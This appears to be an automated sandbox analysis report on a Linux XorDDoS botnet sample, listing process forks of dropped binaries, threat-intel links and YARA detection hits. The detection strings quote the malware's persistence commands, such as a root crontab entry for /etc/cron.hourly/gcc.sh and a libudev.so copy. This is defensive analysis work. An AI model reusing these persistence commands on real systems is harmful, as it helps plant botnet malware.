gvjfjjanun (PID: 6551, Parent: 1860, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun "netstat -antop" 6205

gvjfjjanun New Fork (PID: 6555, Parent: 6551)

1.elf New Fork (PID: 6553, Parent: 6205)

1.elf New Fork (PID: 6554, Parent: 6553)

gvjfjjanun (PID: 6554, Parent: 1860, MD5: 4780b1384292ab14583c4f650cf92dc1) Arguments: /usr/bin/gvjfjjanun uptime 6205

gvjfjjanun New Fork (PID: 6556, Parent: 6554)

1.elf New Fork (PID: 6559, Parent: 6205)

1.elf New Fork (PID: 6560, Parent: 6559)

fubjkoogoo (PID: 6560, Parent: 6559, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo who 6205

fubjkoogoo New Fork (PID: 6564, Parent: 6560)

1.elf New Fork (PID: 6561, Parent: 6205)

1.elf New Fork (PID: 6562, Parent: 6561)

fubjkoogoo (PID: 6562, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo "cd /etc" 6205

fubjkoogoo New Fork (PID: 6568, Parent: 6562)

1.elf New Fork (PID: 6563, Parent: 6205)

1.elf New Fork (PID: 6565, Parent: 6563)

fubjkoogoo (PID: 6565, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo "echo \"find\"" 6205

fubjkoogoo New Fork (PID: 6569, Parent: 6565)

1.elf New Fork (PID: 6566, Parent: 6205)

1.elf New Fork (PID: 6567, Parent: 6566)

fubjkoogoo (PID: 6567, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo bash 6205

fubjkoogoo New Fork (PID: 6572, Parent: 6567)

1.elf New Fork (PID: 6570, Parent: 6205)

1.elf New Fork (PID: 6571, Parent: 6570)

fubjkoogoo (PID: 6571, Parent: 1860, MD5: 0ea6b59dfc99f2b10cc3bdc90a93485b) Arguments: /usr/bin/fubjkoogoo "ps -ef" 6205

fubjkoogoo New Fork (PID: 6573, Parent: 6571)

1.elf New Fork (PID: 6576, Parent: 6205)

1.elf New Fork (PID: 6577, Parent: 6576)

ptcfhyyirf (PID: 6577, Parent: 6576, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "grep \"A\"" 6205

ptcfhyyirf New Fork (PID: 6580, Parent: 6577)

1.elf New Fork (PID: 6578, Parent: 6205)

1.elf New Fork (PID: 6579, Parent: 6578)

ptcfhyyirf (PID: 6579, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf bash 6205

ptcfhyyirf New Fork (PID: 6584, Parent: 6579)

1.elf New Fork (PID: 6581, Parent: 6205)

1.elf New Fork (PID: 6582, Parent: 6581)

ptcfhyyirf (PID: 6582, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "netstat -antop" 6205

ptcfhyyirf New Fork (PID: 6588, Parent: 6582)

1.elf New Fork (PID: 6583, Parent: 6205)

1.elf New Fork (PID: 6585, Parent: 6583)

ptcfhyyirf (PID: 6585, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "route -n" 6205

ptcfhyyirf New Fork (PID: 6589, Parent: 6585)

1.elf New Fork (PID: 6586, Parent: 6205)

1.elf New Fork (PID: 6587, Parent: 6586)

ptcfhyyirf (PID: 6587, Parent: 1860, MD5: 50b1c82c7fcc2c240a21aebd9dea3c69) Arguments: /usr/bin/ptcfhyyirf "route -n" 6205

ptcfhyyirf New Fork (PID: 6590, Parent: 6587)

1.elf New Fork (PID: 6596, Parent: 6205)

1.elf New Fork (PID: 6597, Parent: 6596)

bsvlwqppmd (PID: 6597, Parent: 6596, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd who 6205

bsvlwqppmd New Fork (PID: 6601, Parent: 6597)

1.elf New Fork (PID: 6598, Parent: 6205)

1.elf New Fork (PID: 6599, Parent: 6598)

bsvlwqppmd (PID: 6599, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd whoami 6205

bsvlwqppmd New Fork (PID: 6605, Parent: 6599)

1.elf New Fork (PID: 6600, Parent: 6205)

1.elf New Fork (PID: 6602, Parent: 6600)

bsvlwqppmd (PID: 6602, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd "grep \"A\"" 6205

bsvlwqppmd New Fork (PID: 6607, Parent: 6602)

1.elf New Fork (PID: 6603, Parent: 6205)

1.elf New Fork (PID: 6604, Parent: 6603)

bsvlwqppmd (PID: 6604, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd "sleep 1" 6205

bsvlwqppmd New Fork (PID: 6609, Parent: 6604)

1.elf New Fork (PID: 6606, Parent: 6205)

1.elf New Fork (PID: 6608, Parent: 6606)

bsvlwqppmd (PID: 6608, Parent: 1860, MD5: 205f8a5a8b0d1f6be71274fa6ff34534) Arguments: /usr/bin/bsvlwqppmd "netstat -antop" 6205

bsvlwqppmd New Fork (PID: 6610, Parent: 6608)

1.elf New Fork (PID: 6613, Parent: 6205)

1.elf New Fork (PID: 6614, Parent: 6613)

uhjknuzvai (PID: 6614, Parent: 6613, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai "route -n" 6205

uhjknuzvai New Fork (PID: 6618, Parent: 6614)

1.elf New Fork (PID: 6615, Parent: 6205)

1.elf New Fork (PID: 6616, Parent: 6615)

uhjknuzvai (PID: 6616, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai "ls -la" 6205

uhjknuzvai New Fork (PID: 6622, Parent: 6616)

1.elf New Fork (PID: 6617, Parent: 6205)

1.elf New Fork (PID: 6619, Parent: 6617)

uhjknuzvai (PID: 6619, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai "sleep 1" 6205

uhjknuzvai New Fork (PID: 6623, Parent: 6619)

1.elf New Fork (PID: 6620, Parent: 6205)

1.elf New Fork (PID: 6621, Parent: 6620)

uhjknuzvai (PID: 6621, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai pwd 6205

uhjknuzvai New Fork (PID: 6626, Parent: 6621)

1.elf New Fork (PID: 6624, Parent: 6205)

1.elf New Fork (PID: 6625, Parent: 6624)

uhjknuzvai (PID: 6625, Parent: 1860, MD5: 91456298716554fecad3edd5ee4b700a) Arguments: /usr/bin/uhjknuzvai bash 6205

uhjknuzvai New Fork (PID: 6627, Parent: 6625)

1.elf New Fork (PID: 6630, Parent: 6205)

1.elf New Fork (PID: 6631, Parent: 6630)

lkpssqmflq (PID: 6631, Parent: 6630, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq top 6205

lkpssqmflq New Fork (PID: 6635, Parent: 6631)

1.elf New Fork (PID: 6632, Parent: 6205)

1.elf New Fork (PID: 6633, Parent: 6632)

lkpssqmflq (PID: 6633, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq top 6205

lkpssqmflq New Fork (PID: 6639, Parent: 6633)

1.elf New Fork (PID: 6634, Parent: 6205)

1.elf New Fork (PID: 6636, Parent: 6634)

lkpssqmflq (PID: 6636, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq su 6205

lkpssqmflq New Fork (PID: 6640, Parent: 6636)

1.elf New Fork (PID: 6637, Parent: 6205)

1.elf New Fork (PID: 6638, Parent: 6637)

lkpssqmflq (PID: 6638, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq gnome-terminal 6205

lkpssqmflq New Fork (PID: 6643, Parent: 6638)

1.elf New Fork (PID: 6641, Parent: 6205)

1.elf New Fork (PID: 6642, Parent: 6641)

lkpssqmflq (PID: 6642, Parent: 1860, MD5: e3edc5b700334c5fb57de877def5e6a9) Arguments: /usr/bin/lkpssqmflq "ifconfig eth0" 6205

lkpssqmflq New Fork (PID: 6644, Parent: 6642)

systemd New Fork (PID: 6217, Parent: 6216)

snapd-env-generator (PID: 6217, Parent: 6216, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1.elf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
1.elf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
1.elf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
1.elf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
1.elf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
1.elf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
1.elf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
1.elf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 3 entries

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/ssrfvzfvpk	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/ssrfvzfvpk	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/ssrfvzfvpk	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/ssrfvzfvpk	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/ssrfvzfvpk	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/ssrfvzfvpk	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/ssrfvzfvpk	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/uaewjndswe	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/uaewjndswe	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/uaewjndswe	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/uaewjndswe	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/uaewjndswe	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/uaewjndswe	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/uaewjndswe	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/uaewjndswe	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/cpbnjarskl	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/cpbnjarskl	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/cpbnjarskl	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/cpbnjarskl	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/cpbnjarskl	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/cpbnjarskl	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/cpbnjarskl	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/cpbnjarskl	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/lib/libudev.so	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/lib/libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wxysocrflf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wxysocrflf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wxysocrflf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/wxysocrflf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wxysocrflf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/wxysocrflf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wxysocrflf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/wxysocrflf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/efgdvbpuxx	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/efgdvbpuxx	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/efgdvbpuxx	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/efgdvbpuxx	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/efgdvbpuxx	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/efgdvbpuxx	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/efgdvbpuxx	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
